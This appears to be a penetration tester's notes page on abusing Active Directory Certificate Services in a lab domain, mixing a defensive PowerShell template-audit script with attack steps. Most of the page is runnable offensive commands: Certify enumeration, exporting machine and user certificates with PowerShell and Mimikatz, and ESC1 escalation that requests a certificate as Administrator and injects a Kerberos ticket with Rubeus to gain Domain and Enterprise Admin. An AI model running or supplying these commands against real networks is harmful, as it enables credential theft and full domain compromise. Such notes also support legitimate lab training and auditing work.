
ADCS

Conditions that make a certificate template vulnerable to abuse

  • CA grants normal/low privileged users enrollment rights

  • Manager approval is disabled

  • Authorization signatures are not required

  • Target template grants normal/low privileged users enrollment rights

Enumerating Active Directory Certificate Services (ADCS)

Identify the ADCS service installation

Certify.exe cas

Enumerate the templates configured

Certify.exe find

Enumerate the vulnerable templates

Certify.exe find /vulnerable

If enrolleeSuppliesSubject is set but enrollment is not allowed for all domain users, the template will not show up in the vulnerable list and needs to be enumerated separately (ESC1)

Certify.exe find /enrolleeSuppliesSubject
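
The same ESC1 conditions listed above can be audited from the defender's side without Certify. The following PowerShell is an added example, not from this page or from any tool it names: it reads every template in the Configuration partition and reports those where a low-privileged principal can enroll, the enrollee supplies the subject, no manager approval or authorized signature is required, and the EKU allows logon. It assumes the ActiveDirectory module, an account that can read the Configuration naming context, and a chosen list of "low privileged" groups; enrollment rights on the CA object itself are not checked.

```powershell
# Added defender-side audit of the ESC1 template conditions listed above.
# Assumes the ActiveDirectory module and read access to the Configuration
# partition; CA-level enrollment rights are not checked here.
Import-Module ActiveDirectory

$configNC   = (Get-ADRootDSE).configurationNamingContext
$tmplBase   = "CN=Certificate Templates,CN=Public Key Services,CN=Services,$configNC"
$enrollGuid = [Guid]'0e10c968-78fb-11d1-a364-00c04fb950dc'  # Certificate-Enrollment extended right
$allGuid    = [Guid]'00000000-0000-0000-0000-000000000000'  # ACE not scoped to a single right
$rights     = [System.DirectoryServices.ActiveDirectoryRights]

# Principals treated as low privileged for the enrollment-rights check (assumption)
$lowPriv = @('Authenticated Users', 'Everyone', 'Domain Users', 'Domain Computers')

# EKUs that make an issued certificate usable for logon; a template with no EKU also qualifies
$authEku = @('1.3.6.1.5.5.7.3.2',      # Client Authentication
             '1.3.6.1.4.1.311.20.2.2', # Smart Card Logon
             '1.3.6.1.5.2.3.4',        # PKINIT Client Authentication
             '2.5.29.37.0')            # Any Purpose

$props = 'msPKI-Certificate-Name-Flag', 'msPKI-Enrollment-Flag', 'msPKI-RA-Signature',
         'pKIExtendedKeyUsage', 'nTSecurityDescriptor'

Get-ADObject -SearchBase $tmplBase -LDAPFilter '(objectClass=pKICertificateTemplate)' -Properties $props |
ForEach-Object {
    $t = $_
    $suppliesSubject = ($t.'msPKI-Certificate-Name-Flag' -band 0x1) -ne 0  # CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    $managerApproval = ($t.'msPKI-Enrollment-Flag' -band 0x2) -ne 0        # CT_FLAG_PEND_ALL_REQUESTS
    $sigsRequired    = [int]$t.'msPKI-RA-Signature' -gt 0
    $ekus            = @($t.pKIExtendedKeyUsage | Where-Object { $_ })
    $authCapable     = ($ekus.Count -eq 0) -or (@($ekus | Where-Object { $authEku -contains $_ }).Count -gt 0)

    # A low-privileged principal can enroll if it holds GenericAll, or an ExtendedRight
    # ACE that names the Enroll right or is unscoped (covers every extended right).
    $enrollAces = @($t.nTSecurityDescriptor.Access | Where-Object {
        $name = ($_.IdentityReference.Value -split '\\')[-1]
        $_.AccessControlType -eq 'Allow' -and ($lowPriv -contains $name) -and (
            $_.ActiveDirectoryRights.HasFlag($rights::GenericAll) -or
            ($_.ActiveDirectoryRights.HasFlag($rights::ExtendedRight) -and
             ($_.ObjectType -eq $enrollGuid -or $_.ObjectType -eq $allGuid)))
    })

    if ($enrollAces.Count -gt 0 -and $suppliesSubject -and -not $managerApproval -and -not $sigsRequired -and $authCapable) {
        $ekuText = if ($ekus.Count) { $ekus -join ', ' } else { '(none: any purpose)' }
        [PSCustomObject]@{
            Template  = $t.Name
            EKUs      = $ekuText
            Enrollers = ($enrollAces.IdentityReference.Value | Sort-Object -Unique) -join ', '
        }
    }
} | Format-Table -AutoSize
```

A template reported here should have the enrollee-supplies-subject flag removed or manager approval enabled, and its enrollment ACE restricted to the group that is actually meant to enroll.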

Persistence (THEFT-4): Extracting User and Machine certificates

List all certificates for local machine in certificate store

ls cert:\LocalMachine\My

Export the certificate in PFX format

ls cert:\LocalMachine\My\89C1171F6810A6725A47DB8D572537D736D4FF17 | Export-PfxCertificate -FilePath C:\Users\Public\pawadmin.pfx -Password (ConvertTo-SecureString -String 'niks' -Force -AsPlainText)

Use Mimikatz to export certificate in pfx format (default cert pass is mimikatz)

# Export certificates from the current user's store (PFX, password mimikatz)
Invoke-mimikatz -Command "crypto::certificates /export"
# Export certificates from the local machine store
Invoke-mimikatz -Command "!crypto::certificates /systemstore:local_machine /export"
# Base64-encode the exported PFX so it can be passed inline to Rubeus
cat cert.pfx | base64 -w 0
# Request a TGT with the certificate and inject it into the current session
C:\AD\Tools\Rubeus.exe asktgt /user:nlamb /certificate:MNeg[...]IH0A== /password:mimikatz /nowrap /ptt

Escalation (ESC1): Domain User to Domain Admin and Enterprise Admin

CASE I: Domain Admin

Request certificate for DA user using ESC1 technique, and save it as cert.pem

Certify.exe request /ca:Techcorp-DC.techcorp.local\TECHCORP-DC-CA /template:ForAdminsofPrivilegedAccessWorkstations /altname:Administrator

Convert cert.pem to cert.pfx format

C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\DA.pfx

Request TGT using the pfx certificate and inject it into memory

Rubeus.exe asktgt /user:Administrator /certificate:C:\AD\Tools\DA.pfx /password:niks /nowrap /ptt

CASE II: Enterprise Admin

Request certificate for EA user using ESC1 technique

Certify.exe request /ca:Techcorp-DC.techcorp.local\TECHCORP-DC-CA /template:ForAdminsofPrivilegedAccessWorkstations /altname:Administrator

Convert cert.pem to cert.pfx format

C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\EA.pfx

Request TGT using the pfx certificate and inject it into memory

Rubeus.exe asktgt /user:techcorp.local\Administrator /dc:techcorp-dc.techcorp.local /certificate:C:\AD\Tools\EA.pfx /password:niks /nowrap /ptt


Last updated 1 year ago